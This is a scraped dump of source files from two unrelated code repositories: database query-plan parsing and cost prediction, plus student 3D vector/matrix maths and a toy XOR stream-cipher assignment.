break\n elif \"->\" not in line:\n continue\n else:\n if line.index(\"->\") < spaces:\n while line.index(\"->\") < spaces:\n current_node, spaces = node_stack.pop()\n\n if line.index(\"->\") > spaces:\n line_copy = line\n feature_vec = [0.0] * feature_len\n start_cost, end_cost, rows, width, a_start_cost, a_end_cost, a_rows = extract_time(\n line_copy\n )\n feature_vec[feature_len - 7: feature_len] = [\n start_cost,\n end_cost,\n rows,\n width,\n a_start_cost,\n a_end_cost,\n a_rows,\n ]\n operator, in_operators = extract_operator(line_copy)\n feature_vec[operators.index(operator)] = 1.0\n if operator == \"Seq Scan\":\n extract_attributes(\n operator, line_copy, feature_vec, scan_cnt\n )\n scan_cnt += 1\n else:\n j = 0\n while (\n \"actual\" not in lines[i + j] and \"Plan\" not in lines[i + j]\n ):\n extract_attributes(operator, lines[i + j], feature_vec)\n j += 1\n tokens = feature_vec\n new_node = Node(tokens, parent=current_node)\n current_node.add_child(new_node)\n if len(current_node.children) > max_children:\n max_children = len(current_node.children)\n node_stack.append((current_node, spaces))\n current_node = new_node\n spaces = line.index(\"->\")\n elif line.index(\"->\") == spaces:\n line_copy = line\n feature_vec = [0.0] * feature_len\n start_cost, end_cost, rows, width, a_start_cost, a_end_cost, a_rows = extract_time(\n line_copy\n )\n feature_vec[feature_len - 7: feature_len] = [\n start_cost,\n end_cost,\n rows,\n width,\n a_start_cost,\n a_end_cost,\n a_rows,\n ]\n operator, in_operators = extract_operator(line_copy)\n feature_vec[operators.index(operator)] = 1.0\n if operator == \"Seq Scan\":\n extract_attributes(\n operator, line_copy, feature_vec, scan_cnt\n )\n scan_cnt += 1\n else:\n j = 0\n while (\n \"actual\" not in lines[i + j] and \"Plan\" not in lines[i + j]\n ):\n extract_attributes(operator, lines[i + j], feature_vec)\n j += 1\n tokens = feature_vec\n new_node = Node(tokens, parent=node_stack[-1][0])\n node_stack[-1][0].add_child(new_node)\n if len(node_stack[-1][0].children) > max_children:\n max_children = len(node_stack[-1][0].children)\n current_node = new_node\n spaces = line.index(\"->\")\n # break\n # print(scan_cnt)\n return plan_trees, max_children # a list of the roots nodes\n\n\ndef parse_dep_tree_text_lb_ub(folder_name=\"data/\"):\n scan_cnt = 0\n max_children = 0\n plan_trees = []\n feature_len = 9 + 6 + 7 + 32\n for each_plan in sorted(os.listdir(folder_name)):\n # print(each_plan)\n with open(os.path.join(folder_name, each_plan), \"r\") as f:\n lines = f.readlines()\n feature_vec = [0.0] * feature_len\n operator, in_operators = extract_operator(lines[0])\n if not in_operators:\n operator, in_operators = extract_operator(lines[1])\n start_cost, end_cost, rows, width, a_start_cost, a_end_cost, a_rows = extract_time(\n lines[1]\n )\n j = 2\n else:\n start_cost, end_cost, rows, width, a_start_cost, a_end_cost, a_rows = extract_time(\n lines[0]\n )\n j = 1\n feature_vec[feature_len - 7: feature_len] = [\n start_cost,\n end_cost,\n rows,\n width,\n a_start_cost,\n a_end_cost,\n a_rows,\n ]\n feature_vec[operators.index(operator)] = 1.0\n if operator == \"Seq Scan\":\n extract_attributes(operator, lines[j], feature_vec, scan_cnt)\n scan_cnt += 1\n root_tokens = feature_vec\n current_node = Node(root_tokens)\n plan_trees.append(current_node)\n continue\n else:\n while \"actual\" not in lines[j] and \"Plan\" not in lines[j]:\n extract_attributes(operator, lines[j], feature_vec)\n j += 1\n root_tokens = feature_vec # 所有吗\n current_node = Node(root_tokens)\n plan_trees.append(current_node)\n\n spaces = 0\n node_stack = []\n i = j\n while not lines[i].startswith(\"Planning time\"):\n line = lines[i]\n i += 1\n if line.startswith(\"Planning time\") or line.startswith(\n \"Execution time\"\n ):\n break\n elif line.strip() == \"\":\n break\n elif \"->\" not in line:\n continue\n else:\n if line.index(\"->\") < spaces:\n while line.index(\"->\") < spaces:\n current_node, spaces = node_stack.pop()\n\n if line.index(\"->\") > spaces:\n line_copy = line\n feature_vec = [0.0] * feature_len\n start_cost, end_cost, rows, width, a_start_cost, a_end_cost, a_rows = extract_time(\n line_copy\n )\n feature_vec[feature_len - 7: feature_len] = [\n start_cost,\n end_cost,\n rows,\n width,\n a_start_cost,\n a_end_cost,\n a_rows,\n ]\n operator, in_operators = extract_operator(line_copy)\n feature_vec[operators.index(operator)] = 1.0\n if operator == \"Seq Scan\":\n\n # if(operator == \"Seq Scan\" or operator == \"Index Only Scan using title_pkey on title t\"\n # or operator=='Index Scan using title_pkey on title t'):\n extract_attributes(\n operator, line_copy, feature_vec, scan_cnt\n )\n scan_cnt += 1\n else:\n j = 0\n while (\n \"actual\" not in lines[i + j] and \"Plan\" not in lines[i + j]\n ):\n extract_attributes(operator, lines[i + j], feature_vec)\n j += 1\n tokens = feature_vec\n new_node = Node(tokens, parent=current_node)\n current_node.add_child(new_node)\n if len(current_node.children) > max_children:\n max_children = len(current_node.children)\n node_stack.append((current_node, spaces))\n current_node = new_node\n spaces = line.index(\"->\")\n elif line.index(\"->\") == spaces:\n line_copy = line\n feature_vec = [0.0] * feature_len\n start_cost, end_cost, rows, width, a_start_cost, a_end_cost, a_rows = extract_time(\n line_copy\n )\n feature_vec[feature_len - 7: feature_len] = [\n start_cost,\n end_cost,\n rows,\n width,\n a_start_cost,\n a_end_cost,\n a_rows,\n ]\n operator, in_operators = extract_operator(line_copy)\n feature_vec[operators.index(operator)] = 1.0\n if operator == \"Seq Scan\":\n # if(operator == \"Seq Scan\" or operator == \"Index Only Scan using title_pkey on title t\" or\n # operator=='Index Scan using title_pkey on title t'):\n extract_attributes(\n operator, line_copy, feature_vec, scan_cnt\n )\n scan_cnt += 1\n else:\n j = 0\n while (\n \"actual\" not in lines[i + j] and \"Plan\" not in lines[i + j]\n ):\n extract_attributes(operator, lines[i + j], feature_vec)\n j += 1\n tokens = feature_vec\n new_node = Node(tokens, parent=node_stack[-1][0])\n node_stack[-1][0].add_child(new_node)\n if len(node_stack[-1][0].children) > max_children:\n max_children = len(node_stack[-1][0].children)\n current_node = new_node\n spaces = line.index(\"->\")\n # break\n # print(scan_cnt)\n return plan_trees, max_children # a list of the roots nodes\n\n\ndef p2t(node):\n # prediction to true cardinality\n # return float(start_cost),float(end_cost),float(rows),float(width),\n # float(a_start_cost),float(a_end_cost),float(a_rows)\n tree = {}\n tmp = node.data\n operators_count = 9\n columns_count = 6\n scan_features = 64\n assert len(tmp) == operators_count + columns_count + 7 + scan_features\n tree[\"features\"] = tmp[: operators_count + columns_count + scan_features]\n # tree['features'].append(tmp[-5]) #with card as feature\n tree[\"features\"].append(tmp[-1]) # with Actual card as feature\n # cardinality\n # tree['labels'] = np.log(node.data[-1]+1) #cardinality\n # tree['pg'] = np.log(node.data[-5])\n # cost\n tree[\"labels\"] = np.log(node.data[-2]) # cost\n tree[\"pg\"] = np.log(node.data[-6])\n\n tree[\"children\"] = []\n for children in node.children:\n tree[\"children\"].append(p2t(children))\n return tree\n\n\ndef tree_feature_label(root: Node):\n label = root.data[-1]\n operators_count = 9\n columns_count = 6\n scan_features = 64\n feature_len = operators_count + columns_count + scan_features\n\n def feature(root: Node):\n root.data = root.data[:feature_len]\n if root.children:\n for child in root.children:\n feature(child)\n\n feature(root)\n return root, np.log(label) if label > 1 else label\n\n\nif __name__ == \"__main__\":\n print(os.path.abspath(\".\"))\n plan_tree, max_children = parse_dep_tree_text(folder_name=\"./data/deep_plan\")\n # add_node_index(plan_tree[1])\n # leaf,node = test(plan_tree[1])\n\n print(len(plan_tree))\n"
},
{
"alpha_fraction": 0.39833712577819824,
"alphanum_fraction": 0.5011337995529175,
"avg_line_length": 76.88235473632812,
"blob_id": "04243c0cfe2706753fa8971683b51550020ccb32",
"content_id": "265b124da2fb66b5a681f52309ba7fc216bc844d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1323,
"license_type": "no_license",
"max_line_length": 222,
"num_lines": 17,
"path": "/README.md",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "# Tree-structured Attention with Hierarchical Accumulation for Query Plan Cardinality and Cost Prediction\n\n## Ackonwledge\n\nFor the realization of the paper Tree-structured Attention with Hierarchical Accumulation [Tree-structured Attention with Hierarchical Accumulation](https://arxiv.org/abs/2002.08046).\n\nWe use it in the database to perdict the cost of a plan and cardinality of the query plan.\n\n\n## Environment\n\n## Experiment\n\n| version | parpmeter | result |\n| ------- | -------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| v1.0 | d_model=128,<br> d_ff=128, N=2, lr=0.001, epoch=10 | max qerror: 662924.5300 <br> mean qerror: 1018.3936 <br> media qerror: 3.1462<br> 90th qerror: 23.3711 <br> 95th qerror: 51.8297 <br> 99th qerror: 756.4599 |\n| v1.1 | d_model=521,dff=128, N=2, lr=0.001, epoch=10 |max qerror: 892079.6152 <br> mean qerror: 2151.0649 <br> media qerror: 3.1404 <br> 90th qerror: 31.9187 <br> 95th qerror: 72.9243 <br> 99th qerror: 2229.1361|"
},
{
"alpha_fraction": 0.637050211429596,
"alphanum_fraction": 0.6397156715393066,
"avg_line_length": 30.704225540161133,
"blob_id": "9ae2ea0757c3f1c7a2ac1900b3a9189f602a101c",
"content_id": "58e94ab164e72d70c16af867f96d6408a4b66e8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2251,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 71,
"path": "/util/dataset.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "import time\nimport copy\nimport math\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport os\nimport sys\nfrom torch.utils.data import Dataset, DataLoader\n\n\nsys.path.append(os.path.abspath(os.getcwd()))\n# print(sys.path)\n\nfrom util.plan_to_tree import Node, parse_dep_tree_text, tree_feature_label\nfrom util.prase_tree2node_leaf import tree2NodeLeafmat\n\n\nclass PlanDataset(Dataset):\n def __init__(self, root_dir, transform=None):\n self.root_dir = root_dir\n self.planTrees, self.maxchild = parse_dep_tree_text(folder_name=root_dir)\n self.trees_labels = [tree_feature_label(i) for i in self.planTrees]\n self.transform = transform\n\n def __len__(self):\n return len(self.planTrees)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n # root + label\n tree, label = self.trees_labels[idx]\n nodemat, leafmat = tree2NodeLeafmat(tree)\n\n return (tree, nodemat, leafmat, torch.tensor(label, dtype=torch.double).reshape((1)))\n\n\ndef remove_signle_tree(root_dir, target_dir):\n planTrees, _ = parse_dep_tree_text(folder_name=root_dir)\n plan_dir = sorted(os.listdir(root_dir))\n for dir_name, tree in zip(plan_dir, planTrees):\n if tree.children:\n with open(os.path.join(root_dir, dir_name), \"r\") as read_f:\n lines = read_f.readlines()\n with open(os.path.join(target_dir, dir_name), \"w\") as write_f:\n write_f.writelines(lines)\n\n\ndef test_label():\n dataset = PlanDataset(root_dir=\"/home/jitao/hierarchical_attention/data/deep_plan\")\n for i, data in enumerate(dataset):\n tree, nodemat, leafmat, label = data\n # print(label.shape)\n print(label)\n if np.isnan(label.numpy()):\n print(\"nan:\", i)\n if np.isinf(label.numpy()):\n print(\"inf\", i)\n\n\nif __name__ == \"__main__\":\n remove_signle_tree(\n # root_dir=\"/data1/jitao/dataset/cardinality/all_plan\",\n root_dir=\"/home/jitao/hierarchical_attention/data/cardinality\",\n target_dir=\"/home/jitao/hierarchical_attention/data/deep_cardinality\",\n )\n # pass\n # data = PlanDataset(root_dir=\"data/data2\")\n # test_label()\n"
},
{
"alpha_fraction": 0.6835664510726929,
"alphanum_fraction": 0.7045454382896423,
"avg_line_length": 24.954545974731445,
"blob_id": "638c1498fe7f0f26256889134392b05e715ab9a6",
"content_id": "7db33a160c87d6336163a4bb079584629418a6f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 22,
"path": "/util/result.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport os\nimport numpy as np\n\n\nsys.path.append(os.path.abspath(os.getcwd()))\n\nfrom util.qerror import cal_q_error, print_qerror\n\n\nwith open(\"/home/jitao/hierarchical_attention/data/dmodel512/resutlv1.0-e10-N4-lr0.001.txt\", 'r') as f:\n lines = f.readlines()\n label_output = [line.split(' ') for line in lines]\n label = [float(label) for label, _ in label_output]\n output = [float(output) for _, output in label_output]\n\n\nlen(label)\n\nqerror = [cal_q_error(predict, actually) for predict, actually in zip(output, label)]\n\nprint_qerror(q_error=qerror)\n"
}
] | 10 |
NaSummer/CPS3498-Assignment | https://github.com/NaSummer/CPS3498-Assignment | f4c647f45f2af06cb1c6f5fb21b079786ed12716 | 629d0bbf4c700a88e9a2e885b33cd59ea97267ee | 71690d33cb3d97f053a4e49af051c984cd0599de | refs/heads/master | 2020-12-24T06:54:11.054384 | 2016-06-03T05:14:26 | 2016-06-03T05:14:26 | 60,319,913 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5310173630714417,
"alphanum_fraction": 0.5570719838142395,
"avg_line_length": 24.1875,
"blob_id": "0ff007f16772e4935910f7db12092d45290449f1",
"content_id": "e3c025e9fd4d6441dca6210cc96f6ab4425380e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 32,
"path": "/Assignment01/tool/keygen.py",
"repo_name": "NaSummer/CPS3498-Assignment",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport hashlib\nimport time\n\nFILE_NAME_KEY = 'key.txt'\n\nclass KeyGen(object):\n \n def __init__(self):\n self.key = self.__randomKeyGen()\n self.__storeKey()\n \n #seed generator\n def __randomSeedGen(self):\n return str(time.time()*10000000)\n \n\n #key generator\n def __randomKeyGen(self):\n hasher = hashlib.md5()\n hasher.update(self.__randomSeedGen().encode('utf-8'))\n i = int(time.time()) % 100 + 64\n while i > 0:\n hasher.update(hasher.hexdigest().encode('utf-8'))\n i = i - 1\n return hasher.hexdigest()\n\n #store key to key.txt\n def __storeKey(self):\n with open(FILE_NAME_KEY,'w', encoding='utf-8') as file_key:\n file_key.write(self.key)\n"
},
{
"alpha_fraction": 0.5163204669952393,
"alphanum_fraction": 0.52878338098526,
"avg_line_length": 28.561403274536133,
"blob_id": "097d0539a266a7cc7f3d086d76ada171348ae860",
"content_id": "eed8b630117b633386fa07b95d3629ba89017fa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1685,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 57,
"path": "/Assignment01/decryption.py",
"repo_name": "NaSummer/CPS3498-Assignment",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tool.pseudorandom\nimport math\nimport struct\n\nFILE_NAME_PLAINTEXT = 'mesage_decrypted.txt'\nFILE_NAME_CIPHERTEXT = 'toyou'\nFILE_NAME_KEY = 'key.txt'\n\n# get 16 bytes from Rseudorandom Number Gennerator\ndef __get16bytes():\n i = 16\n ans = 0\n while i > 0:\n i -= 1\n ans += prng.getByte() * int(math.pow(2, i))\n return ans\n\n# ========== main ==========\nif __name__ == '__main__':\n\n # use key.txt as a key to implement Pseudorandom Number Generator\n key = ''\n with open(FILE_NAME_KEY, 'r', encoding='utf-8') as file_key:\n key = file_key.read()\n prng = tool.pseudorandom.PseudorandomNumGen(key)\n\n # open ciphertext\n with open(FILE_NAME_CIPHERTEXT, 'rb') as file_ciphertext:\n\n # open plaintext decrypted. if not exist, create(open() function)\n with open(FILE_NAME_PLAINTEXT, 'w', encoding='utf-8') as file_plaintext:\n\n # ===== open two file successfully, begin to work =====\n\n # flag for judging whether reaching the end of the file\n done = 0\n while not done:\n # the length of long int is 8 bits\n tmp_ciphertext = file_ciphertext.read(8)\n if (tmp_ciphertext != b''):\n\n # trans bin to long int\n index_bit = struct.unpack('L', tmp_ciphertext)\n\n # XOR\n ord_plaintext = index_bit[0] ^ __get16bytes()\n\n # write file\n file_plaintext.write(chr(ord_plaintext))\n\n else:\n done = 1\n\n # =================== end of work ====================\n"
},
{
"alpha_fraction": 0.43457943201065063,
"alphanum_fraction": 0.4587227404117584,
"avg_line_length": 22.685184478759766,
"blob_id": "b63846167eb395b2a3ea41ec80c7b60c9f9f03a5",
"content_id": "7ebbbeb89479b194d775e0f128a92cd084fb18ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1284,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 54,
"path": "/Assignment01/tool/pseudorandom.py",
"repo_name": "NaSummer/CPS3498-Assignment",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nclass PseudorandomNumGen(object):\n \n def __init__(self, key):\n self.key = key\n self.blist = self.__key2blist(self.key)\n # print(self.blist)\n # print(self.key)\n\n # key to bit list\n def __key2blist(seglf, key):\n length = len(key)\n blist = []\n \n i = 0\n while i < length:\n tmp_chr = ord(key[i])\n #print(tmp_chr)\n i = i + 1\n j = 8\n while j > 0:\n #print(tmp_chr)\n if tmp_chr & 0x80 == 0:\n blist.append(0)\n else:\n blist.append(1)\n tmp_chr = tmp_chr << 1\n j = j - 1\n\n return blist\n\n def getByte(self):\n length = len(self.blist)\n tmp_list = []\n\n tmp_list.append(self.blist.pop(0))\n tmp_list.append(self.blist[length-2])\n tmp_list.append(self.blist[(length-1)//2])\n\n self.blist.append(tmp_list[0]^tmp_list[1]^tmp_list[2])\n\n return tmp_list[0]^tmp_list[2]\n\n# test\nif __name__=='__main__':\n prng = PseudorandomNumGen('adfsfadfads')\n\n i = 1000\n while i > 0:\n print(prng.getByte())\n #print(prng.blist)\n i = i - 1\n \n"
},
{
"alpha_fraction": 0.5675306916236877,
"alphanum_fraction": 0.5777626037597656,
"avg_line_length": 27.19230842590332,
"blob_id": "205eb8d10f5f9694454a35d2896fa0a624c39b5a",
"content_id": "5adebff7b89af7cd259fed59b1d688836577cacf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1466,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 52,
"path": "/Assignment01/encryption.py",
"repo_name": "NaSummer/CPS3498-Assignment",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# The seed for Rseudorandom Number Generator is generated by tool.keygen and stored in key.txt\n\n\nimport tool.keygen\nimport tool.pseudorandom\nimport math\nimport struct\n\nFILE_NAME_PLAINTEXT = 'mesage.txt'\nFILE_NAME_CIPHERTEXT = 'toyou'\n\n# get 16 bytes from Rseudorandom Number Generator\ndef __get16bytes():\n i = 16\n ans = 0\n while i > 0:\n i -= 1\n ans += prng.getByte() * int(math.pow(2, i))\n return ans\n\n# ========= main ==========\nif __name__ == '__main__':\n\n # implement Rseudorandom Number Generator\n prng = tool.pseudorandom.PseudorandomNumGen(tool.keygen.KeyGen().key)\n\n # open plaintext\n with open(FILE_NAME_PLAINTEXT, 'r', encoding='utf-8') as file_plaintext:\n\n # open ciphertext(bin). if not exist, create(open() function)\n with open(FILE_NAME_CIPHERTEXT, 'wb') as file_ciphertext:\n\n # ===== open two file successfully, begin to work =====\n\n # read plaintext chr by chr\n for chr_plaintext in file_plaintext.read():\n\n index_chr = ord(chr_plaintext)\n\n # XOR\n bit_ciphertext = index_chr ^ __get16bytes()\n\n # change int to bin\n parsedata_ciphertext = struct.pack(\"L\", bit_ciphertext)\n\n # store bin to a bin file\n file_ciphertext.write(parsedata_ciphertext)\n\n # =================== end of work =====================\n"
}
] | 4 |
BillMaZengou/maths_3d_algorithm | https://github.com/BillMaZengou/maths_3d_algorithm | 61e861e00296eed65e4902df5edcd630bd13d8fa | 2b88d9c864e1f179d5e3f8946f3a966ba43933a9 | 20ebf9edf1f9750a286abb97cbd9659790ee8658 | refs/heads/master | 2023-02-13T07:09:32.914413 | 2021-01-14T10:27:59 | 2021-01-14T10:27:59 | 327,021,781 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.45738810300827026,
"alphanum_fraction": 0.495810329914093,
"avg_line_length": 31.6200008392334,
"blob_id": "d31e2e885409c47b1b1725d812484d22fd47125b",
"content_id": "3af2c664c1a9cb7d55dcbb1c32c7f24afb07f618",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4893,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 150,
"path": "/python/matrix_naive.py",
"repo_name": "BillMaZengou/maths_3d_algorithm",
"src_encoding": "UTF-8",
"text": "from vector_naive import *\nimport math_tools as maths\n\nclass Matrix_3d(object):\n \"\"\"create a matrix in 3d\"\"\"\n\n def __init__(self, c1=Vector_3d(), c2=Vector_3d(), c3=Vector_3d()):\n super(Matrix_3d, self).__init__()\n assert type(c1) is Vector_3d and \\\n type(c2) is Vector_3d and \\\n type(c3) is Vector_3d\n assert c1.ifTransposed == c2.ifTransposed == c3.ifTransposed\n\n self.c1 = c1\n self.c2 = c2\n self.c3 = c3\n\n if self.c1.ifTransposed:\n self.ifTransposed = True\n else:\n self.ifTransposed = False\n\n def __str__(self):\n if self.ifTransposed:\n result = \"[{} {} {}\\n {} {} {}\\n {} {} {}]\"\\\n .format(self.c1.x, self.c1.y, self.c1.z,\\\n self.c2.x, self.c2.y, self.c2.z,\\\n self.c3.x, self.c3.y, self.c3.z)\n else:\n result = \"[{} {} {}\\n {} {} {}\\n {} {} {}]\"\\\n .format(self.c1.x, self.c2.x, self.c3.x,\\\n self.c1.y, self.c2.y, self.c3.y,\\\n self.c1.z, self.c2.z, self.c3.z)\n return result\n\n def __neg__(self):\n return Vector_3d(-self.c1, -self.c2, -self.c3)\n\n def __add__(self, matrix):\n assert type(matrix) is Matrix_3d\n assert matrix.ifTransposed == self.ifTransposed\n return Matrix_3d( self.c1 + matrix.c1,\n self.c2 + matrix.c2,\n self.c3 + matrix.c3)\n\n def __sub__(self, matrix):\n assert type(matrix) is Matrix_3d\n assert matrix.ifTransposed == self.ifTransposed\n return Matrix_3d( self.c1 - matrix.c1,\n self.c2 - matrix.c2,\n self.c3 - matrix.c3)\n\n def __mul__(self, *args):\n if self.ifTransposed == False:\n assert len(args) == 1\n r = args[0]\n if isinstance(r, int) or isinstance(r, float):\n return Matrix_3d(self.c1*r, self.c2*r, self.c3*r)\n elif isinstance(r, Vector_3d) and \\\n r.ifTransposed == False:\n return self.c1*r.x + self.c2*r.y + self.c3*r.z\n elif isinstance(r, Matrix_3d) and \\\n r.ifTransposed == False:\n return Matrix_3d(self*r.c1, self*r.c2, self*r.c3)\n\n def __rmul__(self, const):\n assert type(const) is float or int\n return self * const\n\n def __truediv__(self, const):\n return self * (1/const)\n\n def __eq__(self, another_matrix):\n assert type(another_matrix) is Matrix_3d\n if another_matrix.ifTransposed == self.ifTransposed:\n if (self.c1 == another_matrix.c1\n and self.c2 == another_matrix.c2\n and self.c3 == another_matrix.c3):\n return True\n else:\n return False\n else:\n if another_matrix.ifTransposed == True:\n return transposed_matrix(another_matrix) == self\n elif self.ifTransposed == True:\n return another_matrix == transposed_matrix(self)\n\n def transpose(self):\n t = (not self.transpose)\n c1 = Vector_3d(self.c1.x, self.c1.y, self.c1.z, t)\n c2 = Vector_3d(self.c2.x, self.c2.y, self.c2.z, t)\n c3 = Vector_3d(self.c3.x, self.c3.y, self.c3.z, t)\n return Matrix_3d(c1, c2, c3)\n\ndef transposed_matrix(m):\n assert m.ifTransposed == True\n c1 = Vector_3d(m.c1.x, m.c2.x, m.c3.x)\n c2 = Vector_3d(m.c1.y, m.c2.y, m.c3.y)\n c3 = Vector_3d(m.c1.z, m.c2.z, m.c3.z)\n return Matrix_3d(c1, c2, c3)\n\ndef identity(ifTransposed=False):\n c1 = Vector_3d(1, 0, 0, ifTransposed)\n c2 = Vector_3d(0, 1, 0, ifTransposed)\n c3 = Vector_3d(0, 0, 1, ifTransposed)\n return Matrix_3d(c1, c2, c3)\n\ndef main():\n i = Vector_3d(0, 1, 0)\n j = Vector_3d(0, 0, 1)\n k = Vector_3d(1, 0, 0)\n M = Matrix_3d(i, j, k)\n print(M)\n i = Vector_3d(0, 0, 1)\n j = Vector_3d(1, 0, 0)\n k = Vector_3d(0, 1, 0)\n N = Matrix_3d(i, j, k)\n print(N)\n I = identity()\n print(I)\n print( M + I == I + M )\n print( (M+I) + N == M + (I+N) )\n a = 2\n b = 3\n print(b*M)\n print( a * (b*M) == (a*b) * M )\n print( a * (M+I) == a*M + a*I )\n print( (a+b) * M == a*M + b*M )\n v = Vector_3d(3, 4, 0)\n print( I*v )\n I_trans = identity(True)\n print( I == I_trans )\n print(I * i)\n print(M * N)\n\n i = Vector_3d(0, 0, 2)\n j = Vector_3d(3, 0, 0)\n k = Vector_3d(0, 4, 0)\n F = Matrix_3d(i, j, k)\n print(F)\n print( (a*M) * N == a * (M*N) )\n print( (M*N) * F == M * (N*F) )\n print()\n K = (M*N).transpose()\n print(K.ifTransposed)\n print( transposed_matrix((M*N).transpose()) == transposed_matrix(M.transpose())*transposed_matrix(N.transpose()) )\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.4544695019721985,
"alphanum_fraction": 0.5045948028564453,
"avg_line_length": 26.204545974731445,
"blob_id": "c61fd37367946e634a5b1e33991fe43e3f34630f",
"content_id": "56cfd8cea6f763ba572bcedf815b07619343f755",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1197,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 44,
"path": "/python/algorithm_set.py",
"repo_name": "BillMaZengou/maths_3d_algorithm",
"src_encoding": "UTF-8",
"text": "from vector import *\nimport math_tools as maths\n\ndef triangle_area(p1, p2, p3):\n v1 = p2 - p1\n v2 = p3 - p1\n return 1/2 * abs(v1.cross(v2))\n\ndef orthonormal_basis(vectors, dimension=3):\n \"\"\" Gram-Schmidt Process \"\"\"\n assert len(vectors) > dimension-1\n assert type(vectors[0]) is vector_3d\n results = []\n results.append(vectors[0].unit())\n i = 1\n while i < dimension:\n e = vectors[i]\n temp = vector_3d(0, 0, 0)\n for k in range(i):\n temp += e.proj(results[k])\n results.append( (e - temp).unit() )\n i += 1\n return results\n\ndef main():\n ERROR = 10**(-10)\n A = vector_3d(1, 2, 3)\n B = vector_3d(-2, 2, 4)\n C = vector_3d(7, -8, 6)\n print(triangle_area(A, B, C))\n K = [\n vector_3d(maths.Sqrt(2)/2, maths.Sqrt(2)/2, 0),\n vector_3d(-1, 1, -1),\n vector_3d(0, -2, -2)\n ]\n K_dash = orthonormal_basis(K)\n for i in K_dash:\n print(i)\n print( K_dash[0].dot(K_dash[1]) )\n print( ((A.dot(B))**2 + abs(A.cross(B))**2 - (abs(A)**2 * abs(B)**2)) < ERROR )\n print( (A.cross(B).cross(C)) == (A.dot(B)*B - (B.dot(C))*A) )\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5065968632698059,
"alphanum_fraction": 0.5229319334030151,
"avg_line_length": 32.39160919189453,
"blob_id": "16f7b52f0d8bd5cfc599bc923deaed85638c18f4",
"content_id": "e5a9214933bb5d296c0b3be33db7dda79877bba4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4775,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 143,
"path": "/python/vector_naive.py",
"repo_name": "BillMaZengou/maths_3d_algorithm",
"src_encoding": "UTF-8",
"text": "import math_tools as maths\n\nclass Vector_3d(object):\n \"\"\"create a vector in 3d\"\"\"\n\n def __init__(self, x=0, y=0, z=0, ifTransposed=False):\n super(Vector_3d, self).__init__()\n self.x = x\n self.y = y\n self.z = z\n self.ifTransposed = ifTransposed\n\n def __str__(self):\n if self.ifTransposed:\n return \"[{} {} {}]\".format(round(self.x, 3), round(self.y, 3), round(self.z, 3))\n else:\n return \"[{}\\n{}\\n{}]\".format(round(self.x, 3), round(self.y, 3), round(self.z, 3))\n\n def __neg__(self):\n return Vector_3d(-self.x, -self.y, -self.z, self.ifTransposed)\n\n def __add__(self, vector):\n assert type(vector) is Vector_3d\n assert vector.ifTransposed == self.ifTransposed\n return Vector_3d( self.x + vector.x,\n self.y + vector.y,\n self.z + vector.z,\n self.ifTransposed)\n\n def __sub__(self, vector):\n assert type(vector) is Vector_3d\n assert vector.ifTransposed == self.ifTransposed\n return Vector_3d( self.x - vector.x,\n self.y - vector.y,\n self.z - vector.z,\n self.ifTransposed)\n\n def __mul__(self, const):\n assert type(const) is int or float\n return Vector_3d(self.x*const, self.y*const, self.z*const, self.ifTransposed)\n\n def __rmul__(self, const):\n return self * const\n\n def __truediv__(self, const):\n return self * (1/const)\n\n def __eq__(self, another_vector):\n assert type(another_vector) is Vector_3d\n assert another_vector.ifTransposed == self.ifTransposed\n error = 10 ** (-10)\n if (abs(self.x - another_vector.x) < error\n and abs(self.y - another_vector.y) < error\n and abs(self.z - another_vector.z) < error):\n return True\n else:\n return False\n\n def __abs__(self):\n return maths.Sqrt(self.x*self.x + self.y*self.y + self.z*self.z)\n\n def transpose(self):\n self.ifTransposed = not self.ifTransposed\n\n def unit(self):\n return self/abs(self)\n\n def dot(self, another_vector):\n assert type(another_vector) is Vector_3d\n assert another_vector.ifTransposed == False\n return self.x * another_vector.x + \\\n self.y * another_vector.y + \\\n self.z * another_vector.z\n\n def cross(self, another_vector):\n assert type(another_vector) is Vector_3d\n return Vector_3d(\n self.y*another_vector.z - self.z*another_vector.y,\n self.z*another_vector.x - self.x*another_vector.z,\n 